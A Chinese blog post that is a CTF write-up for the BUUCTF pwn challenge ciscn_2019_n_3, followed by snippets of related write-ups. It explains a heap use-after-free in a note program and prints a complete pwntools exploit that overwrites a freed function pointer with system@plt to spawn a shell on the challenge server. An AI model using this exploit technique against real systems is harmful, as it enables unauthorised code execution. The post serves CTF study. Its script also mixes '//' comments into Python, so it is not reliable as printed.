BUUCTF--ciscn_2019_n_31

最新推荐文章于 2024-08-26 21:46:59 发布
最新推荐文章于 2024-08-26 21:46:59 发布
阅读量390 收藏 9
点赞数 9
文章标签: 算法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30528603/article/details/135362720
版权

这是一题32位的堆题,照常看看保护:

没有开启PIE,接着进行黑盒测试:

菜单题,扔进IDA看看代码逻辑:

4这个功能是提供所谓的进阶版,当时我测试的时候以为是里面有后门还是什么的。结果发现是虚晃一枪,主要就是增加删除和展示。下面看看增加的代码功能:

我自己理解的注释写在了上面,do_new函数总结如下:

1.不管你是输入数字还是字符串内容,都会首先创建一个大小为0xc的chunk,用于存放两个函数指针。

2.如果是数字只会创建一个0xc大小的chunk,值存放在两个函数指针的后面。

3.如果是文本字符串内容,首先会创建一个0xc大小的chunk,首先用于存放两个函数指针,紧接着存放一个根据用户申请大小的堆块地址。用户输入的内容将存在于用户申请大小堆块里。

我们分别申请2个类型的堆看看:

申请一个纯数字类型的堆输入的值为0x41:

我们看到起始部分是有个0x151大小的堆。不用管他(应该是程序某个部分开辟的缓冲区)我们真正申请的是0x965d158。

然后我们看看堆里的内容:

我们看到没有任何问题。是我们猜想的那样。

紧接着我们看看申请类型2文本类型的堆会如何(这里我创建的堆的大小为0x88,值为10个a,索引值为0):

我们看到首先会创建一个0xc大小的堆,紧接着就是我们输入大小的堆。我们看看内容:

下面我们看看全局数组到底存了什么:

我们看到它会存放我们0xc的起始位置,看懂这个结构才能明白下面的free代码。

然后我们看看释放堆块的过程:

首先找到索引然后+4找到free的函数地址,紧着着把索引所对应的值当成参数传递

代码很少。但是为我们后续利用留下伏笔(出题人故意让你这么传参的)。因为本地我们用不到show这些功能,因此我就不分析了。我们只分析free的代码:

从free代码我们看到,只是释放那个堆,但是没有置空,全局变量里并没有清空这个堆块,这会引起UAF漏洞:

我们看到此时尽管有一块堆被我们释放并且进入了tcachebins中。但是全局数组依然记录这这块堆地址。(建议这里自己调试下,因为文字讲述实在过于抽象,我对tcachebins机制还不是很了解)

因此我们的利用点就在这了。因为程序中给了system的地址。并且没有开启PIE,因此我们只需要找到一块可重复利用空间覆盖成我们想要的。并利用上面的提到的传参规则。直接看wp比较好理解:

#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pwn import *
#context.log_level = 'debug'
#io=process('./ciscn_2019_n_3')
io=remote('node5.buuoj.cn',27505)
elf = ELF("./ciscn_2019_n_3")


def new(idx,type,value,length=0):
    io.recvuntil("CNote")
    io.sendline(str(1))
    io.recvuntil("Index")
    io.sendline(str(idx))
    io.recvuntil("Type")
    io.sendline(str(type))
    if type == 1:
        io.recvuntil("Value")
        io.sendline(str(value))
    else:
            io.recvuntil("Length")
            io.sendline(str(length))
            io.recvuntil("Value")
            if length == 8:
                io.send(value)
            else:
                io.sendline(value)

def dele(idx):
    io.recvuntil("CNote")
    io.sendline(str(2))
    io.recvuntil("Index")
    io.sendline(str(idx))

def show(idx):
    io.recvuntil("CNote")
    io.sendline(str(3))
    io.recvuntil("Index")
    io.sendline(str(idx))

if __name__ == "__main__":
 #gdb.attach(io) 


  
  new(0,2,'a'*10,0x88)  //申请三个堆
  new(1,2,'b'*10,0x38)
  new(2,1,0x41)        //最末尾创建的大小为0xc的chunk,用于欺骗堆管理器 
  
  dele(1)          //释放索引为1的堆
  
  dele(2)          //释放索引为2的堆
  
  new(3,2,b'sh\x00\x00'+p32(elf.plt['system']),0xc)  //此时再次申请我们就能覆盖索引为1的0xc大

                                                     //小的堆快上
  
  dele(1)                    //触发system

io.interactive()

我这里解释下这个sh\x00\x00和bin/sh功能是一样的。但是这里限制4个字节所以bin/sh参数是用不了的

打通。

call就不要ret
关注
  • 9
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
buuctf——ciscn_2019_n_8
qq_41560595的博客
03-21 544
查看权限 开了好多权限 查看源代码 分析 观察,var数组是int类型,在内存中占了4个字节。输入一个字符串,令var[13]处的值是17,且这个值占4个字节,就能拿到shell。 var中每一个元素占4个字节,payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节,就要用p64打包。 解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*
BUUCTFciscn_2019_n_1 1
qq_41560595的博客
09-24 4349
这道题是栈溢出题型,又不同于一般的栈溢出,在此做个总结。 查看权限 拖入IDA,F5可用函数 解题思路:这道题的意思是输入字符串v1,判断v2。考虑输入长字符串覆盖到存储v2的内存空间,把v2的值改掉。 因此,覆盖0x30-0x4=44个字节给v1,另外4个字节给v2 由于v2数值在内存中以16进制存储,所以,找到11.28125的16进制值。 存在两个比较指令,双击进去。 0x41348000就是16进制的11.28125。 编写脚本 from pwn import * p=remote('
[BUUCTF]-PWN:ciscn_2019_n_3解析
2301_79326813的博客
01-20 824
堆题,先看保护32位,Partial RELRO,没pie关键信息就那么多,看ida大致就是alloc创建堆块,free释放堆块,dump打印堆块内容但是仔细看这三个函数就可以发现在实际运行中,会先创建一个存有free相关函数的地址和打印堆块内容相关函数的地址。看delete函数并结合动态调试,可以知道释放堆块的过程实际上是调用先创造的12字节堆块的rec_str_free。那也就意味着无论那块地址存的是哪里的地址,我们在free堆块时他都会执行,并且题目给了我们system。
BUUCTF 32
qq_52431855的博客
02-28 128
知识点 .git文件泄露:GitHack使用方法 XSS攻击 定义:XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。 32-1[BJDCTF 2nd.
什么是私有地址?如何分类?
热门推荐
qq_44047479的博客
10-30 3万+
什么是私有地址?如何分类? 在现在的网络中,IP地址分为公网IP地址和私有IP地址。 公网IP是在Internet使用的IP地址,而私有IP地址则是在局域网中使用的IP地址。 私有IP地址是一段保留的IP地址。只使用在局域网中,无法在Internet上使用。 当私有网络内的主机要与位于公网上的主机进行通讯时必须经过地址转换,将其私有地址转换为合法公网地址才能对外访问。 NAT-Network Address Translation 网络地址转换 所谓的私有地址就是在互联网上不使用,而被用在局域网络中的地址
[BUUCTF]PWN——hitcontraining_uaf
mcmuyanga的博客
09-07 1690
[BUUCTF]——hitcontraining_uaf 附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,非常常见的创建堆块的菜单 32位ida载入分析,shift+f12查看程序里的字符串,发现了/bin/sh,ctrl+x,跟进找到了后面函数,shell_addr=0x8048945 堆的main函数很简单,逻辑很简单,也没什么好说的,直接看菜单的各个选项 add ...
buuctfciscn_2019_n_8
weixin_54452942的博客
04-12 511
两个方法解题
BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4062
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
BUUCTF pwn ciscn_2019_n_8
菜的只能随便写写博客
02-03 2616
0x01 文件分析  文件很简单,32位,保护都开得差不多。   0x02 运行  输入并且回显。   0x03 IDA源码分析 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch] ...
BUUCTF-PWN ciscn_2019_final_5(临界条件错误,劫持GOT表项)
weixin_44145820的博客
04-14 1021
目录题目分析漏洞分析漏洞利用Exp 题目分析 例行安全检查 没有PIE,方面调试 partial relro意味着这题应该直接改GOT表就能做 菜单: 没有show功能,可以考虑吧某个函数(比如free的GOT)改为puts@plt 可以申请17个chunk,编号为0-16 每次分配结束后会显示分配内存的低12bits 而本题中还有一个特殊的地方,就是content数组(0x6020e0)...
趣味算法------试用 6 和 9 组成的最大数字
最新发布
markingyi的博客
08-26 214
给出一个数字,反转其中一位使数字最大化,递归求解。
算法日记day 45(单调栈之每日温度|接雨水)
m0_74980681的博客
08-22 878
如果大于,则取栈顶元素为中间值并弹出栈顶元素,将遍历的元素与新的栈顶元素值比较取较小者,减去中间值得到高度h,然后栈顶元素下标值减去当前遍历的元素下标值再减一得到宽度w,最后高×宽得到面积,并记录,重复上述操作,直到遍历结束。第三种,如果遍历的元素值大于栈顶元素,用该下标减去栈顶元素下标,并将栈顶元素弹出,继续用该元素与新的栈顶元素比较,如果小于等于,则压入栈,如果大于,重复第三步操作。第一种,如果之后遍历的元素值小于栈顶压入的元素,将该元素的下标压入栈中。如果小于栈顶元素值,则压入栈内。
代码随想录算法训练营19-回溯1
weixin_53416771的博客
08-22 363
画出来的树是这样记录所有组合,一个变量current装当前的处理结果,一个res装所有的处理的结果下面的代码还可以剪枝优化。
7-7 数组中能被5整除的数的和
Virgo_616的博客
08-26 121
在一维数组中有10个整数,求出其中能被5整除的所有数的和。
趣味算法------猴子吃桃(循环,递归双重解法)
markingyi的博客
08-26 172
猴子吃桃问题,已知结果求初始值,分别使用循环和递归两种方式解决。
算法025:前缀和
m0_62319039的博客
08-22 222
算法025:前缀和
C++ | Leetcode C++题解之第374题猜数字大小
Ddddddd_158的博客
08-26 241
C++ | Leetcode C++题解之第374题猜数字大小
算法笔试-编程练习-01-B-23
志远的博客
08-23 833
小红组内有 n 个人,大家合作完成了一个初版方案,初始时大家的愤怒值都是 0。 但是领导对方案并不满意,共需要修改 m 次方案,每次修改会先让第 l 到 r 个人的愤怒值加 1,然后再修改方案;
超分之最近邻插值、线性插值、双线性插值、双三次插值原理
weixin_44342777的博客
08-25 614
超分用于对照实验,或生成低分辨率数据集的常用插值方式:最近邻插值、线性插值、双线性插值、双三次插值的实现原理
buuctf-强网杯2019随便注
09-03
buuctf-强网杯2019随便注是一场2019年强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与注入漏洞相关的题目。 注入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中注入恶意代码来获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值